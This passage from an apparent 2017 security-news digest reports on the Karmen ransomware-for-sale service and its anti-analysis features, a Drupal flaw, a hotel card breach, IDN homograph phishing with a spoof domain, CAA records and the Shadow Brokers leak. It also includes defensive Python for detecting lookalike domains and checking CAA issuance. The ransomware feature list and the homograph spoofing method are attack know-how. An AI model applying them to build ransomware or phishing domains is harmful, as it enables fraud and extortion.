After having a closer look at the malware, Recorded Future security researchers discovered that it is derived from the Hidden Tear open source ransomware. They also found that Karmen uses the AES-256 encryption algorithm to encrypt targeted files on the local machine.
Just as any other ransomware, the threat displays a ransom note with instructions for the victim to pay a specific sum of money to obtain the decryption key. Unlike other similar threats, however, the malware automatically deletes the decryptor when detecting a sandbox environment or analysis software.
Wannabe-criminals buying the ransomware are provided the option to change various settings courtesy of a control panel that doesn’t require advanced technical knowledge to operate. They can also track infected systems via a “Clients” page. A Dashboard offers information such as the number of infected machines, earned revenue, and available updates for the malware.
Karmen is a multi-threaded, multi-language piece of ransomware that supports .NET 4.0 and newer versions and features an adaptive admin panel, researchers say. The malware can encrypt all discs and files, automatically deletes the loader, and features sandbox, debugger, and virtualization detection. Karmen can delete itself after ransom is paid, but also deletes the decryptor if it detects it is being analyzed.
The threat is sold in two versions, namely Light and Full. The former only includes obfuscation and autoloader, while the latter also packs the anti-analysis detection capabilities. While .NET dependent, the malware also requires PHP 5.6 and MySQL.
Flaw in Drupal Module Exposes 120,000 Sites to Attacks
19.4.2017 securityweek Vulnerebility
A critical vulnerability has been found in a Drupal module used by many websites. While the flaw has been fixed, Drupal developers initially advised users to migrate as the affected module had not been updated for several years.
The Drupal security team informed users on April 12 that the third-party module named References was affected by a critical security hole. The module, currently used by more than 121,000 websites, allows users to add references between nodes for more complex information architectures.
References was initially flagged by Drupal developers as unsupported due to the fact that it had received its last update in February 2013. However, on April 14, the Drupal security team announced that they may have found a new maintainer for the module.
On Tuesday, Drupal announced that the vulnerability has been fixed with the release of References 7.x-2.2, which also includes new features and bug fixes.
Drupal’s security team has not released any information on the vulnerability to prevent exploitation, but experts are concerned that malicious actors could manage to find the flaw on their own by analyzing the source code. Drupal said it will release information on this weakness in the next few weeks.
While the References module appears to have found a new maintainer, Drupal website owners can also try out Entity Reference, a module that provides similar functionality. A special module is available for migrating from References to Entity Reference.
Hackers have been known to target Drupal websites using vulnerabilities in third-party modules. Last year, researchers started seeing attempts to exploit a RESTWS module flaw two months after it had been patched.
The most well-known Drupal vulnerability is the one dubbed “Drupalgeddon,” which had still been exploited nearly two years after a patch was released.
InterContinental Hotels Group, the international hotel chain confirmed a second credit card breach
19.4.2017 securityaffairs Incindent
The InterContinental Hotels Group announced last week that payment card systems at more than 1,000 of its hotels had been compromised by crooks.
The multinational hotel chain owns prestigious brands like Holiday Inn and Crowne Plaza.
This is the second time the InterContinental Hotels Group has suffered a credit card breach. Early this year the hotel chain informed its customers that payment cards used between August and December 2016 at the restaurants and bars of 12 US hotels had been affected by a data breach. The affected properties included the InterContinental San Francisco, the Holiday Inn Resort – Aruba and the InterContinental Chicago Magnificent Mile.
On Friday the company published a credit card breach notification on its website informing its customers that a second breach occurred at select hotels between Sept. 29 and Dec. 29 last year.
“Many IHG-branded locations are independently owned and operated franchises, and certain of these franchisee operated locations in the Americas were made aware by payment card networks of patterns of unauthorized charges occurring on payment cards after they were legitimately used at their locations. To ensure an efficient and effective response, IHG hired a leading cyber security firm on behalf of franchisees to coordinate an examination of the payment card processing systems of franchise hotel locations in the Americas region.” reads the announcement published by the InterContinental Hotels Group.
“The investigation identified signs of the operation of malware designed to access payment card data from cards used onsite at front desks at certain IHG-branded franchise hotel locations between September 29, 2016 and December 29, 2016. Although there is no evidence of unauthorized access to payment card data after December 29, 2016, confirmation that the malware was eradicated did not occur until the properties were investigated in February and March 2017.”
The company highlighted that there is no evidence payment card data was accessed after that date, even though some payment systems were still compromised with malware.
The malware that infected the systems at the InterContinental Hotels Group was able to siphon credit card data from the track data on the magnetic stripe (i.e. the customer’s card number, expiration date and internal verification code).
“The malware searched for track data (which sometimes has cardholder name in addition to card number, expiration date, and internal verification code) read from the magnetic stripe of a payment card as it was being routed through the affected hotel server. There is no indication that other guest information was affected.” continues the credit card breach notification.
The number of properties affected by the second breach is still unclear; customers can use a free web tool published by the company to search for potentially affected hotels by state (US and Puerto Rico) and city.
Data in the online tool suggests that more than a thousand hotels were affected by the incident.
The company confirmed that the investigation is still ongoing and that it will periodically update the data provided by the tool according to its findings.
The bad news is that several properties did not participate in the investigation.
In response to the incidents, the company is improving the security of its payment systems in order to repel malware-based attacks.
The hotels affected by this second breach had not yet implemented the announced improvements.
“Before this incident began, many IHG-branded franchise hotel locations had implemented IHG’s Secure Payment Solution (SPS), a point-to-point encryption payment acceptance solution. Properties that had implemented SPS before September 29, 2016 were not affected. Many more properties implemented SPS after September 29, 2016, and the implementation of SPS ended the ability of the malware to find payment card data and, therefore, cards used at these locations after SPS implementation were not affected.” reads the announcement.
Homograph Phishing Attacks are almost impossible to detect on major browsers
19.4.2017 securityaffairs Phishing
The Chinese security researcher Xudong Zheng is warning of homograph phishing attacks that are “almost impossible to detect,” even for experts.
The Chinese security researcher Xudong Zheng has devised a phishing technique that is “almost impossible to detect.”
Hackers can exploit a known vulnerability in the popular web browsers Chrome, Firefox and Opera to display fake domain names to users as if they belonged to legitimate services such as Apple and Google.
This is known as a homograph attack: hackers can register domains such as “xn--pple-43d.com”, which is equivalent to “аpple.com”. This is possible when the address uses characters from another script, for example the Cyrillic “а” (U+0430) rather than the ASCII “a” (U+0041).
To get an idea of the technique reported by Zheng, take a look at the demo web page created by the expert.
The address bar displays the URL
https://www.apple.com/
and the page also uses the HTTPS protocol.
However, if you copy and paste the URL into another page you will see the following address:
https://www.xn--80ak6aa92e.com/
So, if the displayed page is a clone of the legitimate one, there is no visible reason to doubt its authenticity.
Although the homograph attack has been known since 2001, major browsers still have not solved the issue and remain vulnerable to homograph phishing attacks.
“Chrome’s (and Firefox’s) homograph protection mechanism unfortunately fails if every character is replaced with a similar character from a single foreign language. The domain “аррӏе.com”, registered as “xn--80ak6aa92e.com”, bypasses the filter by only using Cyrillic characters.” Xudong Zheng said in a blog post. “You can check this out yourself in the proof-of-concept using Chrome or Firefox. In many instances, the font in Chrome and Firefox makes the two domains visually indistinguishable. It becomes impossible to identify the site as fraudulent without carefully inspecting the site’s URL or SSL certificate. This program nicely demonstrates the difference between the two sets of characters. Internet Explorer and Safari are fortunately not vulnerable.”
Another PoC page was created by researchers at security firm Wordfence; in this case, the experts spoofed the “epic.com” domain.
Major web browsers use ‘Punycode’ encoding by default to represent Unicode characters in the URL.
Punycode converts Unicode characters to the limited ASCII character set (A-Z, 0-9) supported by the Internationalized Domain Names (IDN) system.
The Chinese domain “短.co” is represented in Punycode as “xn--s7y.co”. The xn-- prefix, also known as the ‘ASCII compatible encoding’ prefix, tells the web browser that the domain label uses Punycode encoding to represent Unicode characters.
The flaw reported by the Chinese researcher could be exploited to register a domain containing characters that major browsers render misleadingly. This trick could allow bypassing the phishing protections implemented by several browsers, including Chrome, Firefox and Opera.
Zheng reported this issue to the affected browser vendors early this year. Google has solved the problem in the experimental Chrome Canary 59 and will release a stable fix with the release of Chrome Stable 58.
Until a fix is released, the only way to mitigate homograph phishing attacks is to make your browser display IDN domains in their raw Punycode form instead of as Unicode; unfortunately, only Firefox allows it.
“Firefox users can limit their exposure to this bug by going to about:config and setting network.IDN_show_punycode to true. This will force Firefox to always display IDN domains in its Punycode form, making it possible to identify malicious domains. Thanks to /u/MARKZILLA on reddit for this solution.” wrote Zheng.
“A simple way to limit the damage from bugs such as this is to always use a password manager. In general, users must be very careful and pay attention to the URL when entering personal information. I hope Firefox will consider implementing a fix to this problem since this can cause serious confusion even for those who are extremely mindful of phishing.”
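As an added example, not from Zheng’s post or from any browser’s code, the following Python decodes the Punycode labels discussed above and applies the two display heuristics the article describes: the mixed-script check that catches “xn--pple-43d.com” (аpple.com) and the whole-script-confusable check that the all-Cyrillic “xn--80ak6aa92e.com” (аррӏе.com) slipped past. The lookalike table is a constructed subset; a real implementation would use the full UTS #39 confusables data and a complete IDNA library rather than the raw Punycode codec.

```python
import unicodedata

# Constructed lookalike table: Cyrillic lowercase letters that common UI fonts render
# like Latin letters. Illustrative subset only; UTS #39 publishes the full confusables list.
CYRILLIC_LOOKALIKES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0458": "j", "\u0455": "s",
    "\u04bb": "h", "\u051b": "q", "\u051d": "w", "\u04cf": "l",
}
NEUTRAL = set("0123456789-")  # digits and hyphen belong to no script


def decode_label(label: str) -> str:
    """Return the U-label for an A-label ('xn--...'); other labels pass through.

    Only the Punycode step (RFC 3492) is applied. A full IDNA implementation also
    runs the nameprep/UTS 46 mapping and validity checks around it.
    """
    if label.lower().startswith("xn--"):
        return label[4:].encode("ascii").decode("punycode")
    return label


def script_of(ch: str) -> str:
    """Script taken from the Unicode character name: 'LATIN', 'CYRILLIC', 'CJK', ..."""
    return unicodedata.name(ch, "UNKNOWN").split()[0]


def analyze_label(label: str) -> dict:
    ulabel = decode_label(label)
    scripts = {script_of(c) for c in ulabel if c not in NEUTRAL}
    # Skeleton: what the label reads as if every lookalike is taken for its Latin twin.
    skeleton = "".join(CYRILLIC_LOOKALIKES.get(c, c) for c in ulabel)
    flags = []
    if len(scripts) > 1:
        # The check Chrome and Firefox already performed: Latin mixed with another script.
        flags.append("mixed-script")
    if scripts == {"CYRILLIC"} and all(c in CYRILLIC_LOOKALIKES or c in NEUTRAL for c in ulabel):
        # The case that bypassed that check: a single script, every letter a Latin lookalike.
        flags.append("whole-script-confusable")
    return {"unicode": ulabel, "skeleton": skeleton, "scripts": sorted(scripts), "flags": flags}


def analyze_host(host: str) -> dict:
    """Analyze every label of a hostname (IDNA works label by label) and merge the flags."""
    parts = [analyze_label(label) for label in host.split(".")]
    return {
        "unicode": ".".join(p["unicode"] for p in parts),
        "skeleton": ".".join(p["skeleton"] for p in parts),
        "flags": sorted({f for p in parts for f in p["flags"]}),
    }


def spoofs(host: str, brand: str) -> bool:
    """True when host is not brand but would be read as brand after lookalike folding."""
    r = analyze_host(host)
    return r["unicode"].lower() != brand.lower() and r["skeleton"].lower() == brand.lower()


if __name__ == "__main__":
    for h in ("apple.com", "xn--pple-43d.com", "xn--80ak6aa92e.com", "xn--s7y.co"):
        r = analyze_host(h)
        print(f"{h:22} -> {r['unicode']:12} skeleton={r['skeleton']:12} flags={r['flags']}")
```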
Karmen Ransomware, a cheap RaaS service that implements anti-analysis features
18.4.2017 securityaffairs Ransomware
Experts at Recorded Future have discovered a cheap RaaS, the Karmen ransomware, which deletes its decryptor if it detects a sandbox.
Security experts from threat intelligence firm Recorded Future have spotted a new ransomware-as-a-service (RaaS) called Karmen. The service allows customers to easily create their ransomware campaign in a few steps and without specific skills.
Wannabe crooks can also track infected systems via a “Clients” tab; the dashboard is an efficient and easy-to-use cockpit that shows information such as the number of infected machines, earned revenue and available updates for the malware.
The Karmen RaaS is very cheap at just $175; buyers can set the ransom price and the period in which victims can pay the ransom.
The Karmen ransomware is based on the open-source ransomware Hidden Tear, which was released in August 2015 by the Turkish security researcher Utku Sen for educational purposes.
The first Karmen infections were reported in December 2016, the malware infected machines in Germany and the United States.
The Karmen ransomware is a multi-threaded and multi-language ransomware that supports .NET 4.0 and uses the AES-256 encryption standard.
The malware is .NET dependent and requires PHP 5.6 and MySQL.
“On March 4, 2017, a member of a top-tier cyber criminal community with the username ‘Dereck1’ mentioned a new ransomware variant called ‘Karmen’,” reported a blog post published by Recorded Future.
“Further investigation revealed that “DevBitox,” a Russian-speaking cyber criminal, was the seller behind the Karmen malware on underground forums in March 2017.”
“However, the first cases of infections with Karmen were reported as early as December 2016 by victims in Germany and the United States.”
Once it has infected a machine, the ransomware displays a ransom note with payment instructions. Unlike similar malware, Karmen automatically deletes its decryptor when it detects a sandbox environment or other analysis software.
“A notable feature of Karmen is that it automatically deletes its own decryptor if a sandbox environment or analysis software is detected on the victim’s computer.” continues the blog post.
Below is the list of ransomware features provided by DevBitox:
Multi-threaded
Multi-language
Supports .NET 4.0 and newer versions
Encryption algorithm: AES-256
Adaptive admin panel
Encrypts all discs and files
Separate BTC wallet for each victim
Small size
Automatic deletion of loader
Automatic deletion of malware (after payment was received)
Minimal connection with control server
Robust control panel
Almost FUD (1/35)
Automatic file decryption after received payment
T2W compatible
File extensions remain the same
Detection of anti-debugger/analyzers/VM/sandbox
Automatic deletion of decryptor if sandbox environment is detected on victim’s computer*
Light version: obfuscation and autoloader only
Full version: detection of analyzing software
The ransomware is available for sale in both light and full versions, the light version doesn’t include anti-analysis features.
Moving threat landscape: The reality beyond the cyberwarfare
18.4.2017 securityaffairs CyberWar
It started quietly as a possibility, not a reality. Within months, cyberwarfare has become a reality as plausible as the air we breathe.
The revelation of government hacking units has shed light on a new domain of conflict: cyberwarfare. Once secret, these government units have been publicly revealed, such as the Equation Group and Tailored Access Operations (TAO).
The same tools that feature in debates about digital privacy are operating as you read this, in some digital battle over the internet. This is only the tip of the iceberg, and with every new disclosure we realize that every technology is a risk waiting to be exploited.
Beyond the inevitable costs for the global economy, the risks to human life are as certain as the damage done by physical weapons. One simple program can turn a surveillance camera, a cellphone, a television, or anything in a network of connected devices into a weapon that can massively disrupt critical infrastructure services.
Nowadays the development of new cryptologic technologies, the implementation of information security frameworks, and awareness are the only guarantee humanity has to protect itself. If we consider the impact of a massive attack on critical infrastructure, we must also consider that every single service will stop and no one will be able to call for help.
More disturbing than the impacts of such attacks is the reality that they are already taking place.
The news of North Korea failing to launch a missile due to a US Cyber Command attack brings a new level to the threat landscape and theater of operations for information security. Today the human domain is a target of these cyber operations, and apparently every aspect of society can suffer damage, from hospitals to the power grid.
We see today a completely new market of jobs and opportunities emerging alongside these threats, to protect us from rogue nation-state actors. Corporations and partners must unite with law enforcement agencies to develop new tools and raise awareness among average citizens. A new framework for cyber security and pre-emptive readiness has to be taken into account as the first priority for every democratic country connected to the internet.
The US sabotage of the North Korean missile is not the only news about cyberwarfare. The Mirai botnet and the dangers of IoT are another example of this ongoing threat, one that strikes in the blink of an eye, at the click of a button. As technologies evolve, we must also evolve the countermeasures to contain those threats. The possibility of state actors managing to interfere in democratic republics shows an impact on civil society that can damage a whole nation and the world, as with the reported Russian interference in Europe.
We are on the verge of a drastic change in awareness and preparedness in the cyber domain, and we must prepare ourselves for this new reality as it reaches out and affects everyone, everywhere. With the development of new information security technologies, the creation of jobs can be a reality emerging from the chaos of destruction launched upon us as menaces from these rogue states.
The legacy of computer science has brought humanity both its best and its worst in history. As of today, we must change that reality by advancing the importance of security and developing new technologies to withstand such menaces at no cost in human lives.
Not every apple.com is apple.com. A specialist showed the havoc IDN phishing can cause
18.4.2017 Živě.cz Phishing
Classic web phishing relies on the surfer’s inattention and lures them, for example, to the fake online banking site of a well-known bank, where the site uses a very similar domain, so many people may not notice that a single character has changed.
But alongside this classic phishing there is also the risk of IDN phishing, which can use essentially any character in the Unicode set. And that is a problem: many visually identical characters outside the basic ASCII table can cause a disaster, especially when the browser itself does not warn of the potential confusion.
The Hacker News writes about one such experiment by a Chinese security specialist that demonstrates the potential of IDN phishing on the apple.com domain.
No, nobody hacked Apple’s website; this is not the apple.com domain
And for comparison, the same address in the Edge browser, which correctly marked the domain as an IDN (the special-alphabets icon at the right edge of the address bar) and converted the domain into its substitute characters in classic ASCII format
The apple.com domain belongs to Apple, but try visiting this address in Firefox and Chrome. At first glance the address bar appears to show apple.com, but it is in fact made of visually identical yet different Unicode characters. Firefox and Chrome do not warn that the domain uses Unicode characters, so discovering that it is not apple.com at all but xn--80ak6aa92e.com, which is how the IDN characters can be transcribed into basic ASCII Latin, is practically impossible at first glance.
It can be assumed that the makers of the biggest browsers will patch this potential security hole, but until then let us stay on guard. It is also an argument for those who sharply oppose the introduction of IDN domains in the Czech Republic.
A CAA record pairs a domain with a certification authority; it will be checked from September
18.4.2017 Root.cz Bezpečnost
The CA/Browser Forum has voted that from 8 September certification authorities must check the CAA record type for domains. The record allows the domain operator to choose which authority is authorized to issue a certificate for its domain.
The current certification authority model has several fundamental weaknesses. Among the most visible is the fact that all authorities are equal, i.e. any of them can theoretically issue a certificate for any domain. From the user’s point of view everything will seem fine, because unless their client validates TLSA (DANE) records, for example, or has cached HPKP headers, it will not learn that something is wrong.
An attacker can thus manipulate one of the authorities into issuing a certificate containing the attacker’s own public key. In that case the attacker is able to impersonate someone else’s server, because they hold the private key to a valid certificate issued by a trusted authority. Recently, for example, a bug allowed certificates for GitHub domains to be obtained this way.
Such erroneously issued certificates are a big problem that the community is intensively addressing. Chrome developers, for example, are strongly pushing the Certificate Transparency database, the use of which will become mandatory for authorities later this year. It makes it possible to discover after the fact that a certificate was issued for your domain without authorization. If you monitor this log automatically (for example with the certspotter utility), you will notice the certificate. By then, however, it has already been issued and may be misused against users.
CAA as prevention
The CAA record type aims to prevent erroneous issuance of certificates. Using this DNS record, the domain operator specifies which authorities are authorized to issue certificates for the domain. Checking the record is so far voluntary for the authority, but it is an extra safeguard, because it protects the authority from erroneous issuance, whether caused by a technical problem or by deliberate manipulation.
Importantly, unlike the TLSA record mentioned above, CAA records are not meant for validation by end clients. Applications must not use them when checking the trustworthiness of a certificate; RFC 6844, which introduces these records, explicitly forbids this. The main reason is that the records may change over time: the authority consults them at issuance time, while a client may later see a different state, for example one intended for a new authority. For clients, the TLSA record remains the valid mechanism.
When a new certificate request arrives, the authority, in addition to its other validation steps, checks the domain for the presence of a CAA record. If it exists and permits the given authority to issue, the process may continue. If the record points to a different authority, the issuance process should be stopped.
Of course there are still many scenarios that allow this check to be bypassed. An attacker may take complete control of the authority’s systems and issue a certificate without any check. They may also obtain the authority’s private keys and then sign certificates at will. However, we have seen a whole series of cases where a minor bug in an authority’s API was exploited or the validation process was disrupted. In such a situation a CAA record would very likely have allowed the issuance to be stopped. It can likewise serve as a defence against fully automated authorities that an attacker might manipulate. There are still many situations where one more lock helps.
Currently, checking CAA records is entirely voluntary for authorities, and some have already started. Above all they protect themselves from a scandal involving mistakenly issued certificates for important domains. From 8 September, however, all authorities must check the record. Domain administrators will thus have a way to significantly limit the abuse of the PKI system.
There is of course the question of whether some authorities might simply decide to ignore CAA. If they did, they would expose themselves to the risk of removal from the trusted authority databases, because they would be violating one of the binding rules. Moreover, it bears repeating that it is in the authorities’ own interest to support such a safeguard, because it primarily protects themselves. In any case, we have nothing to lose by deploying it.
At the time of writing, the following authorities validate CAA records: Amazon, Certum, Comodo, DigiCert, Entrust, GlobalSign, GoDaddy, Izenpe, QuoVadis, Starfield GoDaddy, StartCom WoSign, Let’s Encrypt, Symantec/GeoTrust/Thawte, T-Telesec, Trustwave, WoSign.
How to get and deploy it
CAA is record type 257, and if you have older utilities (such as dig), it will also be displayed under that number. I tried it: BIND utils 9.9.5, for instance, do not know this record yet, but version 9.11 understands it and shows you both the record name and its decoded, human-readable form.
To create the record you can use the nice web-based CAA Record Generator, where you simply fill in the domain and then click the authorities that are authorized to issue regular or wildcard certificates for it.
The generator then produces the record in the standard form for common DNS servers, or in a legacy form for older versions. In the end the record looks, for example, like this:
$ dig nebezi.cz caa +short
0 issue "letsencrypt.org"
0 issuewild "\;"
You can see there are two records, one for regular certificates for a specific name, the other for wildcard certificates. In the case of the Neběží.cz website we thus signal to authorities that only Let's Encrypt is authorized to issue certificates for the domain. The number in the record (zero in this case) indicates whether the record is critical. If the value were 128, an authority that does not understand the record must not issue the certificate.
There is also the iodef record type, which lets the operator specify how the authority can report to the domain administrator that someone tried to obtain a certificate without authorization. The information travels in the IODEF format (RFC 5070) and can be delivered to the e-mail address given there or to a web service URL according to RFC 6546. The authority’s behaviour in this respect is, however, governed by its internal policies, and there is no guarantee that the authority will report incidents.
An additional safeguard
The CAA record serves as an additional safeguard that does no harm. Many authorities already support it, and in a few months all of them will be required to. Authorities should thus no longer issue a certificate without authorization, provided the domain administrator has deployed the record and lists in it only the authority they actually use.
At the same time it will strengthen external control, for example with the help of Certificate Transparency. It will be possible to automatically check all issued certificates and look up the CAA records of the domain names they contain. At the very least it will thus be possible to very quickly and efficiently identify authorities that issued a certificate despite the mandatory CAA check.
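As an added example, not part of the article or of any CA’s code, the following Python parses CAA records in the `dig +short` presentation form shown above and applies the RFC 6844 issuance rules discussed in this section: issue versus issuewild, the empty ";" value that authorizes nobody, the 128 critical flag, and the lookup that walks up to the parent domain when a name has no CAA records of its own. The zone data, the CA names other than letsencrypt.org and the check_request helper are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed zone data in `dig ... caa +short` presentation form. nebezi.cz carries
# the record set quoted in the article; the *.example.test names are invented.
ZONE: Dict[str, str] = {
    "nebezi.cz": '0 issue "letsencrypt.org"\n0 issuewild "\\;"\n',
    "shop.example.test": '0 issue "example-ca.test; validationmethods=dns-01"\n',
    "legacy.example.test": '128 newtag "a value this CA cannot interpret"\n0 issue "example-ca.test"\n',
}

ISSUER_CRITICAL = 128  # flags bit 7: a CA that does not understand the property must not issue
KNOWN_TAGS = {"issue", "issuewild", "iodef"}


@dataclass
class CAARecord:
    flags: int
    tag: str
    value: str


# `0 issue "letsencrypt.org"` -> flags, tag, quoted value. dig escapes ';' as '\;'.
_LINE = re.compile(r'^\s*(\d+)\s+(\S+)\s+"(.*)"\s*$')


def parse_caa_line(line: str) -> CAARecord:
    m = _LINE.match(line)
    if not m:
        raise ValueError(f"not a CAA presentation line: {line!r}")
    flags, tag, raw = m.groups()
    value = raw.replace("\\;", ";").replace('\\"', '"')  # undo dig's escaping
    return CAARecord(int(flags), tag.lower(), value)


def parse_caa_set(text: str) -> List[CAARecord]:
    return [parse_caa_line(line) for line in text.splitlines() if line.strip()]


def lookup_caa(name: str, zone: Dict[str, str]) -> List[CAARecord]:
    """RFC 6844 lookup, simplified: the closest ancestor (the name itself first) that
    has CAA records governs; CNAME/DNAME handling is omitted."""
    labels = name.rstrip(".").lower().split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in zone:
            return parse_caa_set(zone[candidate])
    return []


def issuer_domain(value: str) -> str:
    """'example-ca.test; validationmethods=dns-01' -> 'example-ca.test'; ';' or '' -> ''."""
    return value.split(";", 1)[0].strip().lower()


def issuance_allowed(records: List[CAARecord], ca_domain: str, wildcard: bool) -> bool:
    # A critical property this CA does not understand forbids issuance outright.
    if any(r.flags & ISSUER_CRITICAL and r.tag not in KNOWN_TAGS for r in records):
        return False
    issue = [r for r in records if r.tag == "issue"]
    issuewild = [r for r in records if r.tag == "issuewild"]
    # issuewild governs wildcard requests when present; otherwise issue applies to both.
    relevant = issuewild if (wildcard and issuewild) else issue
    if not relevant:
        return True  # no applicable property: CAA places no restriction
    # The empty issuer (the ";" form) matches no CA; otherwise the CA's domain must match.
    return any(issuer_domain(r.value) == ca_domain.lower() for r in relevant)


def check_request(name: str, ca_domain: str, zone: Dict[str, str]) -> bool:
    """Decide a certificate request for `name`; a leading '*.' marks a wildcard request."""
    wildcard = name.startswith("*.")
    base = name[2:] if wildcard else name
    return issuance_allowed(lookup_caa(base, zone), ca_domain, wildcard)


if __name__ == "__main__":
    for req, ca in (("nebezi.cz", "letsencrypt.org"), ("*.nebezi.cz", "letsencrypt.org"),
                    ("www.nebezi.cz", "example-ca.test"), ("*.shop.example.test", "example-ca.test"),
                    ("legacy.example.test", "example-ca.test")):
        print(f"{req:22} by {ca:16} -> {'issue' if check_request(req, ca, ZONE) else 'REFUSE'}")
```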
Tools for taking over Windows are freely available. Hackers allegedly obtained them from the NSA
18.4.2017 Živě.cz BigBrother
The hacker group The Shadow Brokers claims to have obtained a large number of hacking tools allegedly created and actively used by the American security agency NSA. In a post on the steemit.com server, the hackers published three files containing the intrusion programs.
The files, named Windows, Swift and OddJob, are encrypted with the GnuPG software. However, even less technically skilled users can currently get at the contents of the archives, because a hacker using the alias Misterch0c uploaded their decrypted form to GitHub.
A toolkit that takes over Windows
The “Windows” folder contains an impressive collection of attack modules used to take complete control of a target computer or to plant a backdoor. The hacking tool is largely automated, so anyone with sufficient technical knowledge could misuse it.
Security expert Matthew Hickey, for instance, has already tested one of the modules (FuzzBunch) and published an illustrative video. It shows him taking control of Windows Server 2008 R2 SP1 in under two minutes.
According to further information, the attack software was effective on Windows 2000, XP, 7 and 8 as well as their server editions (Server 2000, 2003, 2008, 2008 R2 and 2012). Windows 10 and Server 2016 are immune to this threat.
Microsoft issued a statement on the matter saying that most of the vulnerabilities had already been fixed in the past. The latest patches for actively exploited bugs were released a month ago, on 14 March.
Three of the attack modules, namely EnglishmanDentist, EsteemAudit and ExplodingCan, reportedly do not work on currently supported systems (Windows 7 and newer). On outdated systems (Windows XP and the like) these hacking tools remain functional.
Custom malware and banks under control
The second tool, called OddJob, has not yet been thoroughly examined. Its main purpose is to build and then configure custom malicious code according to specific requirements. The attack software also includes a command-and-control server. Details of its real functionality are not currently known.
According to information published on GitHub, the hacking tool is intended for Windows 2000 and newer. The resulting infected files are reportedly not detected by any antivirus software.
The last of the archives contains sensitive information originating from one of the largest SWIFT service providers in the Middle East.
SWIFT (Society for Worldwide Interbank Telecommunication) is a global computer system connecting more than 9,000 banks and financial organizations worldwide. It is used to carry out individual transactions and processes payment orders worth six billion euros a day.
Among the files are extensive lists of the intranet IP addresses of individual clients, including the names of the connected computers (servers). Several public IP addresses also appear, as do usernames and passwords for accessing the system. There are also SQL scripts for searching Oracle databases.
If the software really comes from the NSA, the agency had access to the servers of many banks in 2013. Most of the data comes from financial institutions based in Kuwait, Palestine, Yemen, Qatar and similar countries.
EastNets, the company providing the SWIFT service, issued an official statement on the affair, saying that the information about the attacks is false and unfounded. “An internal security audit revealed no vulnerability or unauthorized access,” EastNets states on its website.
Part of the statement, however, indirectly confirms the origin of the leaked materials: it says that the sensitive information comes from one of the servers that has not been in use since 2013.
The CIA lost a great deal of sensitive material
Recall that this is not an isolated case of a state security organization losing sensitive information or even software. Recently the news that resonated most concerned leaked materials from behind the scenes of the American CIA.
As early as the beginning of March, WikiLeaks published the first part of its information about hacking tools allegedly used by the CIA. The collection of materials was designated Vault 7 and contains 8,761 documents and files.
According to the revelations, the agency’s staff have a wide range of hacking tools at their disposal. With them they can take control of any operating system (Windows, Linux or macOS), take over iOS and Android smartphones, or hack smart TVs.
Thousands of enslaved routers attacked websites
18.4.2017 Novinky/Bezpečnost Počítačový útok
Computer pirates managed to remotely take control of thousands of routers, mainly in households. Through these devices, which are normally used to connect to the internet, they then launched several attacks on various websites. The national security team CSIRT.CZ raised the alarm.
“Thousands of vulnerable home routers have been hacked and are being abused for attacks on websites,” warned Pavel Bašta, a security analyst with the CSIRT.CZ team, which is operated by the CZ.NIC association.
According to him, the cyber raiders used the network of enslaved routers for several attacks, always focusing on smaller sites running WordPress. These generally could not cope with the traffic from such a large number of “users” and crashed.
The cybercriminals managed to enslave only some routers. “The problem affects a whole range of manufacturers of various devices with the integrated web server AllegroSoft RomPager version 4.07. It suffers from a vulnerability known as Misfortune Cookie, which was fixed in later versions,” Bašta explained the technical side.
According to security experts, most of the enslaved routers are located in Algeria, but it cannot be ruled out that Czech routers are also being abused for the attacks.
Users can test for themselves whether their network device is vulnerable thanks to the web company Wordfence, which created a simple application that tests the router’s security with a single click on the “scan me” button. The online tool is available on Wordfence’s English-language pages.
Attacks are increasingly frequent
Cybercriminals increasingly target these gateways to the internet. They take advantage of the fact that users, especially in households, greatly underestimate the security of these devices, and sometimes the same applies to companies. Last year’s Cisco Annual Security Report showed that nine out of ten internet devices have weak points.
The main problem, according to security experts, is that routers cannot be protected by antivirus programs the way computers can. Even so, users are not completely defenceless. “The main way to prevent this threat is to upgrade the router firmware to the current version and not to use the often trivial default username and password. It is also advisable to consider allowing logins to the router only from the internal network and not from the internet,” Pavel Matějíček, technical support manager at Eset, said earlier.
Less experienced users should nevertheless not venture into router configuration. Inappropriate settings can do more harm than good; paradoxically, they could easily open a backdoor for attackers.
The alleged link between the Shadow Brokers data leak and the Stuxnet cyber weapon
18.4.2017 securityaffairs BigBrothers
Security researchers who analyzed the documents and hacking tools included in the last Shadow Brokers dump found a link to the Stuxnet virus.
On Friday, the Shadow Brokers leaked a new bunch of files belonging to the alleged NSA arsenal.
Security researchers who analyzed the documents and hacking tools included in the last dump have discovered many exploits specifically designed to compromise Windows systems.
Digging into the archive, experts spotted a surprising exploit that was used in the Stuxnet cyber weapon, the malware deployed against the Iranian nuclear programme at the Natanz plant.
According to Symantec researcher Liam O’Murchu, the exploit was developed for Windows’ MOF files and it is “almost the exact same script” used in Stuxnet.
“There is a strong connection between Stuxnet and the Shadow Brokers dump,” O’Murchu told Motherboard in an email. “But not enough to definitively prove a connection.”
Let’s see the similarities between the Stuxnet code and the exploit code in the last dump leaked by Shadow Brokers.
Below is a portion of the script from Stuxnet,
and this is a portion of the script dumped by The Shadow Brokers.
Of course, whoever developed the tool included in the Shadow Brokers dump may have borrowed the script from public knowledge of Stuxnet. The same code, for example, was included in the Metasploit framework, allowing anyone to create a MOF file like the one exploited in the Stuxnet attack.
O’Murchu highlighted that the MOF file creation tool in the Shadow Brokers dump had a last-compiled date of September 9, 2010, a few months after the discovery of Stuxnet, but “shortly before the code was added to Metasploit.”
The researcher Kevin Beaumont believes that there is a link between Stuxnet and the exploit shared by Shadow Brokers.
Kevin Beaumont ✔ @GossiTheDog
lol I think this one I just found is one of the exploits used in Stuxnet, even notes patch num
2:48 PM - 14 Apr 2017
Lorenzo Franceschi-Bicchierai from Motherboard also reported that the Avast Antivirus detects some exploits in the Shadow Brokers dump as Stuxnet.
It is very curious, even in the case of a false positive, that the signatures of the exploits match Stuxnet’s.
Are we facing evidence that the NSA-linked Equation Group was involved in the Stuxnet attack, or is this a well organized false-flag operation?
“Therefore, the Stuxnet MOF file creation tool that the Shadow Brokers dropped on Friday is possibly the earliest technical evidence that NSA hackers and developers coded Stuxnet, as many suspect,” added Franceschi-Bicchierai.
VMware Patches Critical RCE Flaw in vCenter Server
18.4.2017 securityaffairs Vulnerebility
